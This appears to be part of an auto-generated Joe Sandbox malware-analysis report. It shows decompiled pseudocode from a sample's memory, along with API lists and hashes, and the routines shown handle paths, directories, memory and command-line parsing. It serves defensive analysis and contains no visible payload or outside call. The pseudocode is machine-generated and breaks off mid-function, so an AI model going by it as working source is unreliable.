                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084409-0
                                                                                                                                                                                                                                            • Opcode ID: cac02e2ebbeb99937f51a8de118db4f31f437215eb32be863aed09ec46d7e2c8
                                                                                                                                                                                                                                            • Instruction ID: 628723ff076366351881e976bd0c66fd5c9855dcfdf30c02463cd70ed210d879
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cac02e2ebbeb99937f51a8de118db4f31f437215eb32be863aed09ec46d7e2c8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38018C7160020DABDB14CFA8EC15BA27769BB48725F048325FA79AB1F1CB71D813CB94
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A0658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				intOrPtr _t4;
                                                                                                                                                                                                                                            				char* _t6;
                                                                                                                                                                                                                                            				char* _t8;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				char* _t16;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				char* _t19;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = __ecx;
                                                                                                                                                                                                                                            				_t10 = __edx;
                                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                                            				_t1 = _t17 + 1; // 0xa08b3f
                                                                                                                                                                                                                                            				_t12 = _t1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t4 =  *_t17;
                                                                                                                                                                                                                                            					_t17 = _t17 + 1;
                                                                                                                                                                                                                                            				} while (_t4 != 0);
                                                                                                                                                                                                                                            				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                            				_t2 = _t18 + 1; // 0xa08b40
                                                                                                                                                                                                                                            				if(_t2 < __edx) {
                                                                                                                                                                                                                                            					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                            					if(_t19 > __ecx) {
                                                                                                                                                                                                                                            						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                            						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                            							 *_t19 = 0x5c;
                                                                                                                                                                                                                                            							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t6 = _a4;
                                                                                                                                                                                                                                            					 *_t19 = 0;
                                                                                                                                                                                                                                            					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                            						_t6 = _t6 + 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return E00A016B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0x8007007a;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x00a06592
                                                                                                                                                                                                                                            0x00a06594
                                                                                                                                                                                                                                            0x00a06596
                                                                                                                                                                                                                                            0x00a06598
                                                                                                                                                                                                                                            0x00a06598
                                                                                                                                                                                                                                            0x00a0659b
                                                                                                                                                                                                                                            0x00a0659b
                                                                                                                                                                                                                                            0x00a0659d
                                                                                                                                                                                                                                            0x00a0659e
                                                                                                                                                                                                                                            0x00a065a2
                                                                                                                                                                                                                                            0x00a065a4
                                                                                                                                                                                                                                            0x00a065a9
                                                                                                                                                                                                                                            0x00a065b2
                                                                                                                                                                                                                                            0x00a065b6
                                                                                                                                                                                                                                            0x00a065ba
                                                                                                                                                                                                                                            0x00a065c3
                                                                                                                                                                                                                                            0x00a065c5
                                                                                                                                                                                                                                            0x00a065c8
                                                                                                                                                                                                                                            0x00a065c8
                                                                                                                                                                                                                                            0x00a065c3
                                                                                                                                                                                                                                            0x00a065c9
                                                                                                                                                                                                                                            0x00a065cc
                                                                                                                                                                                                                                            0x00a065d2
                                                                                                                                                                                                                                            0x00a065d1
                                                                                                                                                                                                                                            0x00a065d1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a065dc
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A08B3E,00A08B3F,00000001,00A08B3E,-00000003,?,00A060EC,00A01140,?), ref: 00A065BA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharPrev
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 122130370-0
                                                                                                                                                                                                                                            • Opcode ID: 4673744771ec4d73af61e3d740a8c5d8e547a0973d119f1086320d95cc1adf76
                                                                                                                                                                                                                                            • Instruction ID: 49754a875a2912940d899c19c79b0f8cd9e0c78d0fdb6d96747626b5f5616391
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4673744771ec4d73af61e3d740a8c5d8e547a0973d119f1086320d95cc1adf76
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49F042321042585FD3314A1DBC84B66BFDD9B85354F14015EE8DAC3385CA656D5683B0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A0621E() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					0x4f0 = 2;
                                                                                                                                                                                                                                            					_t9 = E00A0597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            					_t9 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00a06229
                                                                                                                                                                                                                                            0x00a06230
                                                                                                                                                                                                                                            0x00a06247
                                                                                                                                                                                                                                            0x00a0626a
                                                                                                                                                                                                                                            0x00a06272
                                                                                                                                                                                                                                            0x00a06249
                                                                                                                                                                                                                                            0x00a06255
                                                                                                                                                                                                                                            0x00a0625f
                                                                                                                                                                                                                                            0x00a06264
                                                                                                                                                                                                                                            0x00a06264
                                                                                                                                                                                                                                            0x00a06284

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A0623F
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                              • Part of subcall function 00A06285: GetLastError.KERNEL32(00A05BBC), ref: 00A06285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 381621628-0
                                                                                                                                                                                                                                            • Opcode ID: ddfcd668e6182d5f63b290a01fd33b3588a2c98f083d7242c8c271b0c0022368
                                                                                                                                                                                                                                            • Instruction ID: 78a102782b8ce327ad350f492f8e214488e4be9642e8073c90f78df5019f5031
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddfcd668e6182d5f63b290a01fd33b3588a2c98f083d7242c8c271b0c0022368
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCF0B4B0B0020C6BE750EF74AE02BFA32A8DB58304F400069BA86D60D1DD749D568654
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A04B60(signed int _a4) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t15 + 0xa08d64)) != 1) {
                                                                                                                                                                                                                                            					_t9 = FindCloseChangeNotification( *(_t15 + 0xa08d74)); // executed
                                                                                                                                                                                                                                            					if(_t9 == 0) {
                                                                                                                                                                                                                                            						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t15 + 0xa08d60)) = 1;
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa08d60)) = 1;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa08d68)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa08d70)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa08d6c)) = 0;
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x00a04b66
                                                                                                                                                                                                                                            0x00a04b74
                                                                                                                                                                                                                                            0x00a04b98
                                                                                                                                                                                                                                            0x00a04ba0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04bac
                                                                                                                                                                                                                                            0x00a04ba4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04ba4
                                                                                                                                                                                                                                            0x00a04b78
                                                                                                                                                                                                                                            0x00a04b7e
                                                                                                                                                                                                                                            0x00a04b84
                                                                                                                                                                                                                                            0x00a04b8a
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A04FA1,00000000), ref: 00A04B98
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            • Opcode ID: 9fee1c1810b2a60d72e26f7ccfb6032864b313a2e43d9c4d9316a9cacde32cd9
                                                                                                                                                                                                                                            • Instruction ID: 5ddc67cd1c3adc46ed42981e55d5f5cdcab9afb779a113f3c9fb70a2ec5d44e2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fee1c1810b2a60d72e26f7ccfb6032864b313a2e43d9c4d9316a9cacde32cd9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FF01271500B0C9EDB71CF39DC00652BBE4BBA53603100B2E95EED21D0EB34A861DB98
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A066AE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				unsigned int _t1;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                            				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                            					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x00a066b1
                                                                                                                                                                                                                                            0x00a066ba
                                                                                                                                                                                                                                            0x00a066c7
                                                                                                                                                                                                                                            0x00a066bc
                                                                                                                                                                                                                                            0x00a066be
                                                                                                                                                                                                                                            0x00a066be

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,00A04777,?,00A04E38,?), ref: 00A066B1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                            • Opcode ID: 0fd75034f83e93df4fe82b4761976c403a92803bcf3f4a48a7480f823fd49e87
                                                                                                                                                                                                                                            • Instruction ID: ce7d1e5296317233a8d413d2f2eae70e3701e24625a79e9eefb81bd70405b2c1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0fd75034f83e93df4fe82b4761976c403a92803bcf3f4a48a7480f823fd49e87
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BB0927662254842AA244B717C6955A2941A6D133ABE42B90F032C01E0CA3EC897D004
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A04CA0(long _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x00a04caa
                                                                                                                                                                                                                                            0x00a04cb1

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 00A04CAA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                                                                                            • Opcode ID: 5c9fd04a9a27d6cfd4184fb4bbfcaede2cc6c7ede76e25ec3c432917f1fb0fe8
                                                                                                                                                                                                                                            • Instruction ID: cbd25cc2841f3b6da2baafe76d695fcdcb1a4d74a8d7f618232a21d57e29f29f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c9fd04a9a27d6cfd4184fb4bbfcaede2cc6c7ede76e25ec3c432917f1fb0fe8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72B0123204430CB7CF001FC2EC09F853F1DE7C4761F140000F60C454508A7294128696
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A04CC0(void* _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x00a04cc8
                                                                                                                                                                                                                                            0x00a04ccf

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                                            • Opcode ID: 41c71605d0db4f407c63961c0c69b9192b3de27ca89a2aa2178793002fb065d2
                                                                                                                                                                                                                                            • Instruction ID: 988ab5299beb57cd5985a0fbcfa8959d82faf13d87045f2603e520ee7033b651
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41c71605d0db4f407c63961c0c69b9192b3de27ca89a2aa2178793002fb065d2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AB0123100020CB7CF001F82EC088453F1DD6C03607000010F50C414218B3398138585
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E00A05C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				CHAR* _v265;
                                                                                                                                                                                                                                            				char _v266;
                                                                                                                                                                                                                                            				char _v267;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				CHAR* _v272;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				CHAR* _t69;
                                                                                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				char _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				void* _t132;
                                                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                                                            				signed int _t143;
                                                                                                                                                                                                                                            				CHAR* _t144;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				void* _t146;
                                                                                                                                                                                                                                            				void* _t147;
                                                                                                                                                                                                                                            				void* _t149;
                                                                                                                                                                                                                                            				char _t155;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				void* _t162;
                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                            				char _t167;
                                                                                                                                                                                                                                            				char _t170;
                                                                                                                                                                                                                                            				CHAR* _t173;
                                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                                            				intOrPtr* _t183;
                                                                                                                                                                                                                                            				intOrPtr* _t192;
                                                                                                                                                                                                                                            				CHAR* _t199;
                                                                                                                                                                                                                                            				void* _t200;
                                                                                                                                                                                                                                            				CHAR* _t201;
                                                                                                                                                                                                                                            				void* _t205;
                                                                                                                                                                                                                                            				void* _t206;
                                                                                                                                                                                                                                            				int _t209;
                                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                                            				void* _t212;
                                                                                                                                                                                                                                            				void* _t213;
                                                                                                                                                                                                                                            				CHAR* _t218;
                                                                                                                                                                                                                                            				intOrPtr* _t219;
                                                                                                                                                                                                                                            				intOrPtr* _t220;
                                                                                                                                                                                                                                            				signed int _t221;
                                                                                                                                                                                                                                            				signed int _t223;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t173 = __ecx;
                                                                                                                                                                                                                                            				_t61 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                                            				_t209 = 1;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                            					_t63 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					while(_t209 != 0) {
                                                                                                                                                                                                                                            						_t67 =  *_t173;
                                                                                                                                                                                                                                            						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                            							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v272 = _t173;
                                                                                                                                                                                                                                            						if(_t67 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t69 = _v272;
                                                                                                                                                                                                                                            							_t177 = 0;
                                                                                                                                                                                                                                            							_t213 = 0;
                                                                                                                                                                                                                                            							_t163 = 0;
                                                                                                                                                                                                                                            							_t202 = 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								if(_t213 != 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L21;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t69 =  *_t69;
                                                                                                                                                                                                                                            									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t69 = _v272;
                                                                                                                                                                                                                                            										L21:
                                                                                                                                                                                                                                            										_t155 =  *_t69;
                                                                                                                                                                                                                                            										if(_t155 != 0x22) {
                                                                                                                                                                                                                                            											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            												goto L106;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                            												_t177 = _t177 + 1;
                                                                                                                                                                                                                                            												_t202 = _t202 + 1;
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                            												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            													L106:
                                                                                                                                                                                                                                            													_t63 = 0;
                                                                                                                                                                                                                                            													L125:
                                                                                                                                                                                                                                            													_pop(_t210);
                                                                                                                                                                                                                                            													_pop(_t212);
                                                                                                                                                                                                                                            													_pop(_t162);
                                                                                                                                                                                                                                            													return E00A06CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                            													_t177 = _t177 + 1;
                                                                                                                                                                                                                                            													_t202 = _t202 + 1;
                                                                                                                                                                                                                                            													_t157 = 2;
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												if(_t213 != 0) {
                                                                                                                                                                                                                                            													_t163 = 1;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t213 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L131;
                                                                                                                                                                                                                                            								L30:
                                                                                                                                                                                                                                            								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                            								_t69 = _v272;
                                                                                                                                                                                                                                            							} while ( *_t69 != 0);
